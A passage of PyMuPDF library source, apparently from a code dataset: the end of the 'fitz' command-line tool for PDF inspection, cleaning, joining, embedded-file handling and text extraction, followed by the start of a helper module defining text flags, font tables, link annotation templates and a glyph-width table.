and os.path.isfile(args.path)
):
stream = open(args.path, "rb").read()
else:
stream = None
if args.filename:
filename = args.filename
else:
filename = None
if args.ufilename:
ufilename = args.ufilename
elif args.filename:
ufilename = args.filename
else:
ufilename = None
if args.desc:
desc = args.desc
else:
desc = None
doc.embfile_upd(
args.name, stream, filename=filename, ufilename=ufilename, desc=desc
)
if args.output is None or args.output == args.input:
doc.saveIncr()
else:
doc.save(args.output, garbage=3)
doc.close()
def embedded_list(args):
"""List embedded files."""
doc = open_file(args.input, args.password, pdf=True)
names = doc.embfile_names()
if args.name is not None:
if args.name not in names:
sys.exit("no such embedded file '%s'" % args.name)
else:
print()
print(
"printing 1 of %i embedded file%s:"
% (len(names), "s" if len(names) > 1 else "")
)
print()
print_dict(doc.embfile_info(args.name))
print()
return
if not names:
print("'%s' contains no embedded files" % doc.name)
return
if len(names) > 1:
msg = "'%s' contains the following %i embedded files" % (doc.name, len(names))
else:
msg = "'%s' contains the following embedded file" % doc.name
print(msg)
print()
for name in names:
if not args.detail:
print(name)
continue
_ = doc.embfile_info(name)
print_dict(doc.embfile_info(name))
print()
doc.close()
def extract_objects(args):
"""Extract images and / or fonts from a PDF."""
if not args.fonts and not args.images:
sys.exit("neither fonts nor images requested")
doc = open_file(args.input, args.password, pdf=True)
if args.pages:
pages = get_list(args.pages, doc.page_count + 1)
else:
pages = range(1, doc.page_count + 1)
if not args.output:
out_dir = os.path.abspath(os.curdir)
else:
out_dir = args.output
if not (os.path.exists(out_dir) and os.path.isdir(out_dir)):
sys.exit("output directory %s does not exist" % out_dir)
font_xrefs = set() # already saved fonts
image_xrefs = set() # already saved images
for pno in pages:
if args.fonts:
itemlist = doc.get_page_fonts(pno - 1)
for item in itemlist:
xref = item[0]
if xref not in font_xrefs:
font_xrefs.add(xref)
fontname, ext, _, buffer = doc.extract_font(xref)
if ext == "n/a" or not buffer:
continue
outname = os.path.join(
out_dir, f"{fontname.replace(' ', '-')}-{xref}.{ext}"
)
outfile = open(outname, "wb")
outfile.write(buffer)
outfile.close()
buffer = None
if args.images:
itemlist = doc.get_page_images(pno - 1)
for item in itemlist:
xref = item[0]
if xref not in image_xrefs:
image_xrefs.add(xref)
pix = recoverpix(doc, item)
if type(pix) is dict:
ext = pix["ext"]
imgdata = pix["image"]
outname = os.path.join(out_dir, "img-%i.%s" % (xref, ext))
outfile = open(outname, "wb")
outfile.write(imgdata)
outfile.close()
else:
outname = os.path.join(out_dir, "img-%i.png" % xref)
pix2 = (
pix
if pix.colorspace.n < 4
else fitz.Pixmap(fitz.csRGB, pix)
)
pix2.save(outname)
if args.fonts:
print("saved %i fonts to '%s'" % (len(font_xrefs), out_dir))
if args.images:
print("saved %i images to '%s'" % (len(image_xrefs), out_dir))
doc.close()
def page_simple(page, textout, GRID, fontsize, noformfeed, skip_empty, flags):
eop = b"\n" if noformfeed else bytes([12])
text = page.get_text("text", flags=flags)
if not text:
if not skip_empty:
textout.write(eop) # write formfeed
return
textout.write(text.encode("utf8", errors="surrogatepass"))
textout.write(eop)
return
def page_blocksort(page, textout, GRID, fontsize, noformfeed, skip_empty, flags):
eop = b"\n" if noformfeed else bytes([12])
blocks = page.get_text("blocks", flags=flags)
if blocks == []:
if not skip_empty:
textout.write(eop) # write formfeed
return
blocks.sort(key=lambda b: (b[3], b[0]))
for b in blocks:
textout.write(b[4].encode("utf8", errors="surrogatepass"))
textout.write(eop)
return
def page_layout(page, textout, GRID, fontsize, noformfeed, skip_empty, flags):
eop = b"\n" if noformfeed else bytes([12])
# --------------------------------------------------------------------
def find_line_index(values: List[int], value: int) -> int:
"""Find the right row coordinate.
Args:
values: (list) y-coordinates of rows.
value: (int) lookup for this value (y-origin of char).
Returns:
y-ccordinate of appropriate line for value.
"""
i = bisect.bisect_right(values, value)
if i:
return values[i - 1]
raise RuntimeError("Line for %g not found in %s" % (value, values))
# --------------------------------------------------------------------
def curate_rows(rows: Set[int], GRID) -> List:
rows = list(rows)
rows.sort() # sort ascending
nrows = [rows[0]]
for h in rows[1:]:
if h >= nrows[-1] + GRID: # only keep significant differences
nrows.append(h)
return nrows # curated list of line bottom coordinates
def process_blocks(blocks: List[Dict], page: fitz.Page):
rows = set()
page_width = page.rect.width
page_height = page.rect.height
rowheight = page_height
left = page_width
right = 0
chars = []
for block in blocks:
for line in block["lines"]:
if line["dir"] != (1, 0): # ignore non-horizontal text
continue
x0, y0, x1, y1 = line["bbox"]
if y1 < 0 or y0 > page.rect.height: # ignore if outside CropBox
continue
# upd row height
height = y1 - y0
if rowheight > height:
rowheight = height
for span in line["spans"]:
if span["size"] <= fontsize:
continue
for c in span["chars"]:
x0, _, x1, _ = c["bbox"]
cwidth = x1 - x0
ox, oy = c["origin"]
oy = int(round(oy))
rows.add(oy)
ch = c["c"]
if left > ox and ch != " ":
left = ox # update left coordinate
if right < x1:
right = x1 # update right coordinate
# handle ligatures:
if cwidth == 0 and chars != []: # potential ligature
old_ch, old_ox, old_oy, old_cwidth = chars[-1]
if old_oy == oy: # ligature
if old_ch != chr(0xFB00): # previous "ff" char lig?
lig = joinligature(old_ch + ch) # no
# convert to one of the 3-char ligatures:
elif ch == "i":
lig = chr(0xFB03) # "ffi"
elif ch == "l":
lig = chr(0xFB04) # "ffl"
else: # something wrong, leave old char in place
lig = old_ch
chars[-1] = (lig, old_ox, old_oy, old_cwidth)
continue
chars.append((ch, ox, oy, cwidth)) # all chars on page
return chars, rows, left, right, rowheight
def joinligature(lig: str) -> str:
"""Return ligature character for a given pair / triple of characters.
Args:
lig: (str) 2/3 characters, e.g. "ff"
Returns:
Ligature, e.g. "ff" -> chr(0xFB00)
"""
if lig == "ff":
return chr(0xFB00)
elif lig == "fi":
return chr(0xFB01)
elif lig == "fl":
return chr(0xFB02)
elif lig == "ffi":
return chr(0xFB03)
elif lig == "ffl":
return chr(0xFB04)
elif lig == "ft":
return chr(0xFB05)
elif lig == "st":
return chr(0xFB06)
return lig
# --------------------------------------------------------------------
def make_textline(left, slot, minslot, lchars):
"""Produce the text of one output line.
Args:
left: (float) left most coordinate used on page
slot: (float) avg width of one character in any font in use.
minslot: (float) min width for the characters in this line.
chars: (list[tuple]) characters of this line.
Returns:
text: (str) text string for this line
"""
text = "" # we output this
old_char = ""
old_x1 = 0 # end coordinate of last char
old_ox = 0 # x-origin of last char
if minslot <= fitz.EPSILON:
raise RuntimeError("program error: minslot too small = %g" % minslot)
for c in lchars: # loop over characters
char, ox, _, cwidth = c
ox = ox - left # its (relative) start coordinate
x1 = ox + cwidth # ending coordinate
# eliminate overprint effect
if old_char == char and ox - old_ox <= cwidth * 0.2:
continue
# omit spaces overlapping previous char
if char == " " and (old_x1 - ox) / cwidth > 0.8:
continue
old_char = char
# close enough to previous?
if ox < old_x1 + minslot: # assume char adjacent to previous
text += char # append to output
old_x1 = x1 # new end coord
old_ox = ox # new origin.x
continue
# else next char starts after some gap:
# fill in right number of spaces, so char is positioned
# in the right slot of the line
if char == " ": # rest relevant for non-space only
continue
delta = int(ox / slot) - len(text)
if ox > old_x1 and delta > 1:
text += " " * delta
# now append char
text += char
old_x1 = x1 # new end coordinate
old_ox = ox # new origin
return text.rstrip()
# extract page text by single characters ("rawdict")
blocks = page.get_text("rawdict", flags=flags)["blocks"]
chars, rows, left, right, rowheight = process_blocks(blocks, page)
if chars == []:
if not skip_empty:
textout.write(eop) # write formfeed
return
# compute list of line coordinates - ignoring small (GRID) differences
rows = curate_rows(rows, GRID)
# sort all chars by x-coordinates, so every line will receive char info,
# sorted from left to right.
chars.sort(key=lambda c: c[1])
# populate the lines with their char info
lines = {} # key: y1-ccordinate, value: char list
for c in chars:
_, _, oy, _ = c
y = find_line_index(rows, oy) # y-coord of the right line
lchars = lines.get(y, []) # read line chars so far
lchars.append(c) # append this char
lines[y] = lchars # write back to line
# ensure line coordinates are ascending
keys = list(lines.keys())
keys.sort()
# -------------------------------------------------------------------------
# Compute "char resolution" for the page: the char width corresponding to
# 1 text char position on output - call it 'slot'.
# For each line, compute median of its char widths. The minimum across all
# lines is 'slot'.
# The minimum char width of each line is used to determine if spaces must
# be inserted in between two characters.
# -------------------------------------------------------------------------
slot = right - left
minslots = {}
for k in keys:
lchars = lines[k]
ccount = len(lchars)
if ccount < 2:
minslots[k] = 1
continue
widths = [c[3] for c in lchars]
widths.sort()
this_slot = statistics.median(widths) # take median value
if this_slot < slot:
slot = this_slot
minslots[k] = widths[0]
# compute line advance in text output
rowheight = rowheight * (rows[-1] - rows[0]) / (rowheight * len(rows)) * 1.2
rowpos = rows[0] # first line positioned here
textout.write(b"\n")
for k in keys: # walk through the lines
while rowpos < k: # honor distance between lines
textout.write(b"\n")
rowpos += rowheight
text = make_textline(left, slot, minslots[k], lines[k])
textout.write((text + "\n").encode("utf8", errors="surrogatepass"))
rowpos = k + rowheight
textout.write(eop) # write formfeed
def gettext(args):
doc = open_file(args.input, args.password, pdf=False)
pagel = get_list(args.pages, doc.page_count + 1)
output = args.output
if output == None:
filename, _ = os.path.splitext(doc.name)
output = filename + ".txt"
textout = open(output, "wb")
flags = TEXT_PRESERVE_LIGATURES | TEXT_PRESERVE_WHITESPACE
if args.convert_white:
flags ^= TEXT_PRESERVE_WHITESPACE
if args.noligatures:
flags ^= TEXT_PRESERVE_LIGATURES
if args.extra_spaces:
flags ^= TEXT_INHIBIT_SPACES
func = {
"simple": page_simple,
"blocks": page_blocksort,
"layout": page_layout,
}
for pno in pagel:
page = doc[pno - 1]
func[args.mode](
page,
textout,
args.grid,
args.fontsize,
args.noformfeed,
args.skip_empty,
flags=flags,
)
textout.close()
def main():
"""Define command configurations."""
parser = argparse.ArgumentParser(
prog="fitz",
description=mycenter("Basic PyMuPDF Functions"),
)
subps = parser.add_subparsers(
title="Subcommands", help="Enter 'command -h' for subcommand specific help"
)
# -------------------------------------------------------------------------
# 'show' command
# -------------------------------------------------------------------------
ps_show = subps.add_parser("show", description=mycenter("display PDF information"))
ps_show.add_argument("input", type=str, help="PDF filename")
ps_show.add_argument("-password", help="password")
ps_show.add_argument("-catalog", action="store_true", help="show PDF catalog")
ps_show.add_argument("-trailer", action="store_true", help="show PDF trailer")
ps_show.add_argument("-metadata", action="store_true", help="show PDF metadata")
ps_show.add_argument(
"-xrefs", type=str, help="show selected objects, format: 1,5-7,N"
)
ps_show.add_argument(
"-pages", type=str, help="show selected pages, format: 1,5-7,50-N"
)
ps_show.set_defaults(func=show)
# -------------------------------------------------------------------------
# 'clean' command
# -------------------------------------------------------------------------
ps_clean = subps.add_parser(
"clean", description=mycenter("optimize PDF, or create sub-PDF if pages given")
)
ps_clean.add_argument("input", type=str, help="PDF filename")
ps_clean.add_argument("output", type=str, help="output PDF filename")
ps_clean.add_argument("-password", help="password")
ps_clean.add_argument(
"-encryption",
help="encryption method",
choices=("keep", "none", "rc4-40", "rc4-128", "aes-128", "aes-256"),
default="none",
)
ps_clean.add_argument("-owner", type=str, help="owner password")
ps_clean.add_argument("-user", type=str, help="user password")
ps_clean.add_argument(
"-garbage",
type=int,
help="garbage collection level",
choices=range(5),
default=0,
)
ps_clean.add_argument(
"-compress",
action="store_true",
default=False,
help="compress (deflate) output",
)
ps_clean.add_argument(
"-ascii", action="store_true", default=False, help="ASCII encode binary data"
)
ps_clean.add_argument(
"-linear",
action="store_true",
default=False,
help="format for fast web display",
)
ps_clean.add_argument(
"-permission", type=int, default=-1, help="integer with permission levels"
)
ps_clean.add_argument(
"-sanitize",
action="store_true",
default=False,
help="sanitize / clean contents",
)
ps_clean.add_argument(
"-pretty", action="store_true", default=False, help="prettify PDF structure"
)
ps_clean.add_argument(
"-pages", help="output selected pages pages, format: 1,5-7,50-N"
)
ps_clean.set_defaults(func=clean)
# -------------------------------------------------------------------------
# 'join' command
# -------------------------------------------------------------------------
ps_join = subps.add_parser(
"join",
description=mycenter("join PDF documents"),
epilog="specify each input as 'filename[,password[,pages]]'",
)
ps_join.add_argument("input", nargs="*", help="input filenames")
ps_join.add_argument("-output", required=True, help="output filename")
ps_join.set_defaults(func=doc_join)
# -------------------------------------------------------------------------
# 'extract' command
# -------------------------------------------------------------------------
ps_extract = subps.add_parser(
"extract", description=mycenter("extract images and fonts to disk")
)
ps_extract.add_argument("input", type=str, help="PDF filename")
ps_extract.add_argument("-images", action="store_true", help="extract images")
ps_extract.add_argument("-fonts", action="store_true", help="extract fonts")
ps_extract.add_argument(
"-output", help="folder to receive output, defaults to current"
)
ps_extract.add_argument("-password", help="password")
ps_extract.add_argument(
"-pages", type=str, help="consider these pages only, format: 1,5-7,50-N"
)
ps_extract.set_defaults(func=extract_objects)
# -------------------------------------------------------------------------
# 'embed-info'
# -------------------------------------------------------------------------
ps_show = subps.add_parser(
"embed-info", description=mycenter("list embedded files")
)
ps_show.add_argument("input", help="PDF filename")
ps_show.add_argument("-name", help="if given, report only this one")
ps_show.add_argument("-detail", action="store_true", help="detail information")
ps_show.add_argument("-password", help="password")
ps_show.set_defaults(func=embedded_list)
# -------------------------------------------------------------------------
# 'embed-add' command
# -------------------------------------------------------------------------
ps_embed_add = subps.add_parser(
"embed-add", description=mycenter("add embedded file")
)
ps_embed_add.add_argument("input", help="PDF filename")
ps_embed_add.add_argument("-password", help="password")
ps_embed_add.add_argument(
"-output", help="output PDF filename, incremental save if none"
)
ps_embed_add.add_argument("-name", required=True, help="name of new entry")
ps_embed_add.add_argument("-path", required=True, help="path to data for new entry")
ps_embed_add.add_argument("-desc", help="description of new entry")
ps_embed_add.set_defaults(func=embedded_add)
# -------------------------------------------------------------------------
# 'embed-del' command
# -------------------------------------------------------------------------
ps_embed_del = subps.add_parser(
"embed-del", description=mycenter("delete embedded file")
)
ps_embed_del.add_argument("input", help="PDF filename")
ps_embed_del.add_argument("-password", help="password")
ps_embed_del.add_argument(
"-output", help="output PDF filename, incremental save if none"
)
ps_embed_del.add_argument("-name", required=True, help="name of entry to delete")
ps_embed_del.set_defaults(func=embedded_del)
# -------------------------------------------------------------------------
# 'embed-upd' command
# -------------------------------------------------------------------------
ps_embed_upd = subps.add_parser(
"embed-upd",
description=mycenter("update embedded file"),
epilog="except '-name' all parameters are optional",
)
ps_embed_upd.add_argument("input", help="PDF filename")
ps_embed_upd.add_argument("-name", required=True, help="name of entry")
ps_embed_upd.add_argument("-password", help="password")
ps_embed_upd.add_argument(
"-output", help="Output PDF filename, incremental save if none"
)
ps_embed_upd.add_argument("-path", help="path to new data for entry")
ps_embed_upd.add_argument("-filename", help="new filename to store in entry")
ps_embed_upd.add_argument(
"-ufilename", help="new unicode filename to store in entry"
)
ps_embed_upd.add_argument("-desc", help="new description to store in entry")
ps_embed_upd.set_defaults(func=embedded_upd)
# -------------------------------------------------------------------------
# 'embed-extract' command
# -------------------------------------------------------------------------
ps_embed_extract = subps.add_parser(
"embed-extract", description=mycenter("extract embedded file to disk")
)
ps_embed_extract.add_argument("input", type=str, help="PDF filename")
ps_embed_extract.add_argument("-name", required=True, help="name of entry")
ps_embed_extract.add_argument("-password", help="password")
ps_embed_extract.add_argument(
"-output", help="output filename, default is stored name"
)
ps_embed_extract.set_defaults(func=embedded_get)
# -------------------------------------------------------------------------
# 'embed-copy' command
# -------------------------------------------------------------------------
ps_embed_copy = subps.add_parser(
"embed-copy", description=mycenter("copy embedded files between PDFs")
)
ps_embed_copy.add_argument("input", type=str, help="PDF to receive embedded files")
ps_embed_copy.add_argument("-password", help="password of input")
ps_embed_copy.add_argument(
"-output", help="output PDF, incremental save to 'input' if omitted"
)
ps_embed_copy.add_argument(
"-source", required=True, help="copy embedded files from here"
)
ps_embed_copy.add_argument("-pwdsource", help="password of 'source' PDF")
ps_embed_copy.add_argument(
"-name", nargs="*", help="restrict copy to these entries"
)
ps_embed_copy.set_defaults(func=embedded_copy)
# -------------------------------------------------------------------------
# 'textlayout' command
# -------------------------------------------------------------------------
ps_gettext = subps.add_parser(
"gettext", description=mycenter("extract text in various formatting modes")
)
ps_gettext.add_argument("input", type=str, help="input document filename")
ps_gettext.add_argument("-password", help="password for input document")
ps_gettext.add_argument(
"-mode",
type=str,
help="mode: simple, block sort, or layout (default)",
choices=("simple", "blocks", "layout"),
default="layout",
)
ps_gettext.add_argument(
"-pages",
type=str,
help="select pages, format: 1,5-7,50-N",
default="1-N",
)
ps_gettext.add_argument(
"-noligatures",
action="store_true",
help="expand ligature characters (default False)",
default=False,
)
ps_gettext.add_argument(
"-convert-white",
action="store_true",
help="convert whitespace characters to white (default False)",
default=False,
)
ps_gettext.add_argument(
"-extra-spaces",
action="store_true",
help="fill gaps with spaces (default False)",
default=False,
)
ps_gettext.add_argument(
"-noformfeed",
action="store_true",
help="write linefeeds, no formfeeds (default False)",
default=False,
)
ps_gettext.add_argument(
"-skip-empty",
action="store_true",
help="suppress pages with no text (default False)",
default=False,
)
ps_gettext.add_argument(
"-output",
help="store text in this file (default inputfilename.txt)",
)
ps_gettext.add_argument(
"-grid",
type=float,
help="merge lines if closer than this (default 2)",
default=2,
)
ps_gettext.add_argument(
"-fontsize",
type=float,
help="only include text with a larger fontsize (default 3)",
default=3,
)
ps_gettext.set_defaults(func=gettext)
# -------------------------------------------------------------------------
# start program
# -------------------------------------------------------------------------
args = parser.parse_args() # create parameter arguments class
if not hasattr(args, "func"): # no function selected
parser.print_help() # so print top level help
else:
args.func(args) # execute requested command
if __name__ == "__main__":
main()
| 39,739 | Python | .py | 1,019 | 30.212954 | 88 | 0.542108 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,377 | helper-python.i | pymupdf_PyMuPDF/src_classic/helper-python.i | %pythoncode %{
# ------------------------------------------------------------------------
# Copyright 2020-2022, Harald Lieder, mailto:harald.lieder@outlook.com
# License: GNU AFFERO GPL 3.0, https://www.gnu.org/licenses/agpl-3.0.html
#
# Part of "PyMuPDF", a Python binding for "MuPDF" (http://mupdf.com), a
# lightweight PDF, XPS, and E-book viewer, renderer and toolkit which is
# maintained and developed by Artifex Software, Inc. https://artifex.com.
# ------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# Various PDF Optional Content Flags
# ------------------------------------------------------------------------------
PDF_OC_ON = 0
PDF_OC_TOGGLE = 1
PDF_OC_OFF = 2
# ------------------------------------------------------------------------------
# link kinds and link flags
# ------------------------------------------------------------------------------
LINK_NONE = 0
LINK_GOTO = 1
LINK_URI = 2
LINK_LAUNCH = 3
LINK_NAMED = 4
LINK_GOTOR = 5
LINK_FLAG_L_VALID = 1
LINK_FLAG_T_VALID = 2
LINK_FLAG_R_VALID = 4
LINK_FLAG_B_VALID = 8
LINK_FLAG_FIT_H = 16
LINK_FLAG_FIT_V = 32
LINK_FLAG_R_IS_ZOOM = 64
# ------------------------------------------------------------------------------
# Text handling flags
# ------------------------------------------------------------------------------
TEXT_ALIGN_LEFT = 0
TEXT_ALIGN_CENTER = 1
TEXT_ALIGN_RIGHT = 2
TEXT_ALIGN_JUSTIFY = 3
TEXT_OUTPUT_TEXT = 0
TEXT_OUTPUT_HTML = 1
TEXT_OUTPUT_JSON = 2
TEXT_OUTPUT_XML = 3
TEXT_OUTPUT_XHTML = 4
TEXT_PRESERVE_LIGATURES = 1
TEXT_PRESERVE_WHITESPACE = 2
TEXT_PRESERVE_IMAGES = 4
TEXT_INHIBIT_SPACES = 8
TEXT_DEHYPHENATE = 16
TEXT_PRESERVE_SPANS = 32
TEXT_MEDIABOX_CLIP = 64
TEXT_CID_FOR_UNKNOWN_UNICODE = 128
TEXTFLAGS_WORDS = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_BLOCKS = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_DICT = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_PRESERVE_IMAGES
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_RAWDICT = TEXTFLAGS_DICT
TEXTFLAGS_SEARCH = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_DEHYPHENATE
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_HTML = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_PRESERVE_IMAGES
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_XHTML = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_PRESERVE_IMAGES
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_XML = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
TEXTFLAGS_TEXT = (0
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP
| TEXT_CID_FOR_UNKNOWN_UNICODE
)
# ------------------------------------------------------------------------------
# Simple text encoding options
# ------------------------------------------------------------------------------
TEXT_ENCODING_LATIN = 0
TEXT_ENCODING_GREEK = 1
TEXT_ENCODING_CYRILLIC = 2
# ------------------------------------------------------------------------------
# Stamp annotation icon numbers
# ------------------------------------------------------------------------------
STAMP_Approved = 0
STAMP_AsIs = 1
STAMP_Confidential = 2
STAMP_Departmental = 3
STAMP_Experimental = 4
STAMP_Expired = 5
STAMP_Final = 6
STAMP_ForComment = 7
STAMP_ForPublicRelease = 8
STAMP_NotApproved = 9
STAMP_NotForPublicRelease = 10
STAMP_Sold = 11
STAMP_TopSecret = 12
STAMP_Draft = 13
# ------------------------------------------------------------------------------
# Base 14 font names and dictionary
# ------------------------------------------------------------------------------
Base14_fontnames = (
"Courier",
"Courier-Oblique",
"Courier-Bold",
"Courier-BoldOblique",
"Helvetica",
"Helvetica-Oblique",
"Helvetica-Bold",
"Helvetica-BoldOblique",
"Times-Roman",
"Times-Italic",
"Times-Bold",
"Times-BoldItalic",
"Symbol",
"ZapfDingbats",
)
Base14_fontdict = {}
for f in Base14_fontnames:
Base14_fontdict[f.lower()] = f
del f
Base14_fontdict["helv"] = "Helvetica"
Base14_fontdict["heit"] = "Helvetica-Oblique"
Base14_fontdict["hebo"] = "Helvetica-Bold"
Base14_fontdict["hebi"] = "Helvetica-BoldOblique"
Base14_fontdict["cour"] = "Courier"
Base14_fontdict["coit"] = "Courier-Oblique"
Base14_fontdict["cobo"] = "Courier-Bold"
Base14_fontdict["cobi"] = "Courier-BoldOblique"
Base14_fontdict["tiro"] = "Times-Roman"
Base14_fontdict["tibo"] = "Times-Bold"
Base14_fontdict["tiit"] = "Times-Italic"
Base14_fontdict["tibi"] = "Times-BoldItalic"
Base14_fontdict["symb"] = "Symbol"
Base14_fontdict["zadb"] = "ZapfDingbats"
annot_skel = {
"goto1": "<</A<</S/GoTo/D[%i 0 R/XYZ %g %g %g]>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"goto2": "<</A<</S/GoTo/D%s>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"gotor1": "<</A<</S/GoToR/D[%i /XYZ %g %g %g]/F<</F(%s)/UF(%s)/Type/Filespec>>>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"gotor2": "<</A<</S/GoToR/D%s/F(%s)>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"launch": "<</A<</S/Launch/F<</F(%s)/UF(%s)/Type/Filespec>>>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"uri": "<</A<</S/URI/URI(%s)>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
"named": "<</A<</S/Named/N/%s/Type/Action>>/Rect[%s]/BS<</W 0>>/Subtype/Link>>",
}
class FileDataError(RuntimeError):
"""Raised for documents with file structure issues."""
pass
class FileNotFoundError(RuntimeError):
"""Raised if file does not exist."""
pass
class EmptyFileError(FileDataError):
"""Raised when creating documents from zero-length data."""
pass
# propagate exception class to C-level code
_set_FileDataError(FileDataError)
def css_for_pymupdf_font(
fontcode: str, *, CSS: OptStr = None, archive: AnyType = None, name: OptStr = None
) -> str:
"""Create @font-face items for the given fontcode of pymupdf-fonts.
Adds @font-face support for fonts contained in package pymupdf-fonts.
Creates a CSS font-family for all fonts starting with string 'fontcode'.
Note:
The font naming convention in package pymupdf-fonts is "fontcode<sf>",
where the suffix "sf" is either empty or one of "it", "bo" or "bi".
These suffixes thus represent the regular, italic, bold or bold-italic
variants of a font. For example, font code "notos" refers to fonts
"notos" - "Noto Sans Regular"
"notosit" - "Noto Sans Italic"
"notosbo" - "Noto Sans Bold"
"notosbi" - "Noto Sans Bold Italic"
This function creates four CSS @font-face definitions and collectively
assigns the font-family name "notos" to them (or the "name" value).
All fitting font buffers of the pymupdf-fonts package are placed / added
to the archive provided as parameter.
To use the font in fitz.Story, execute 'set_font(fontcode)'. The correct
font weight (bold) or style (italic) will automatically be selected.
Expects and returns the CSS source, with the new CSS definitions appended.
Args:
fontcode: (str) font code for naming the font variants to include.
E.g. "fig" adds notos, notosi, notosb, notosbi fonts.
A maximum of 4 font variants is accepted.
CSS: (str) CSS string to add @font-face definitions to.
archive: (Archive, mandatory) where to place the font buffers.
name: (str) use this as family-name instead of 'fontcode'.
Returns:
Modified CSS, with appended @font-face statements for each font variant
of fontcode.
Fontbuffers associated with "fontcode" will be added to 'archive'.
"""
# @font-face template string
CSSFONT = "\n@font-face {font-family: %s; src: url(%s);%s%s}\n"
if not type(archive) is Archive:
raise ValueError("'archive' must be an Archive")
if CSS == None:
CSS = ""
# select font codes starting with the pass-in string
font_keys = [k for k in fitz_fontdescriptors.keys() if k.startswith(fontcode)]
if font_keys == []:
raise ValueError(f"No font code '{fontcode}' found in pymupdf-fonts.")
if len(font_keys) > 4:
raise ValueError("fontcode too short")
if name == None: # use this name for font-family
name = fontcode
for fkey in font_keys:
font = fitz_fontdescriptors[fkey]
bold = font["bold"] # determine font property
italic = font["italic"] # determine font property
fbuff = font["loader"]() # load the fontbuffer
archive.add(fbuff, fkey) # update the archive
bold_text = "font-weight: bold;" if bold else ""
italic_text = "font-style: italic;" if italic else ""
CSS += CSSFONT % (name, fkey, bold_text, italic_text)
return CSS
def get_text_length(text: str, fontname: str ="helv", fontsize: float =11, encoding: int =0) -> float:
"""Calculate length of a string for a built-in font.
Args:
fontname: name of the font.
fontsize: font size points.
encoding: encoding to use, 0=Latin (default), 1=Greek, 2=Cyrillic.
Returns:
(float) length of text.
"""
fontname = fontname.lower()
basename = Base14_fontdict.get(fontname, None)
glyphs = None
if basename == "Symbol":
glyphs = symbol_glyphs
if basename == "ZapfDingbats":
glyphs = zapf_glyphs
if glyphs is not None:
w = sum([glyphs[ord(c)][1] if ord(c) < 256 else glyphs[183][1] for c in text])
return w * fontsize
if fontname in Base14_fontdict.keys():
return util_measure_string(
text, Base14_fontdict[fontname], fontsize, encoding
)
if fontname in (
"china-t",
"china-s",
"china-ts",
"china-ss",
"japan",
"japan-s",
"korea",
"korea-s",
):
return len(text) * fontsize
raise ValueError("Font '%s' is unsupported" % fontname)
# ------------------------------------------------------------------------------
# Glyph list for the built-in font 'ZapfDingbats'
# ------------------------------------------------------------------------------
zapf_glyphs = (
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(183, 0.788),
(32, 0.278),
(33, 0.974),
(34, 0.961),
(35, 0.974),
(36, 0.98),
(37, 0.719),
(38, 0.789),
(39, 0.79),
(40, 0.791),
(41, 0.69),
(42, 0.96),
(43, 0.939),
(44, 0.549),
(45, 0.855),
(46, 0.911),
(47, 0.933),
(48, 0.911),
(49, 0.945),
(50, 0.974),
(51, 0.755),
(52, 0.846),
(53, 0.762),
(54, 0.761),
(55, 0.571),
(56, 0.677),
(57, 0.763),
(58, 0.76),
(59, 0.759),
(60, 0.754),
(61, 0.494),
(62, 0.552),
(63, 0.537),
(64, 0.577),
(65, 0.692),
(66, 0.786),
(67, 0.788),
(68, 0.788),
(69, 0.79),
(70, 0.793),
(71, 0.794),
(72, 0.816),
(73, 0.823),
(74, 0.789),
(75, 0.841),
(76, 0.823),
(77, 0.833),
(78, 0.816),
(79, 0.831),
(80, 0.923),
(81, 0.744),
(82, 0.723),
(83, 0.749),
(84, 0.79),
(85, 0.792),
(86, 0.695),
(87, 0.776),
(88, 0.768),
(89, 0.792),
(90, 0.759),
(91, 0.707),
(92, 0.708),
(93, 0.682),
(94, 0.701),
(95, 0.826),
(96, 0.815),
(97, 0.789),
(98, 0.789),
(99, 0.707),
(100, 0.687),
(101, 0.696),
(102, 0.689),
(103, 0.786),
(104, 0.787),
(105, 0.713),
(106, 0.791),
(107, 0.785),
(108, 0.791),
(109, 0.873),
(110, 0.761),
(111, 0.762),
(112, 0.762),
(113, 0.759),
(114, 0.759),
(115, 0.892),
(116, 0.892),
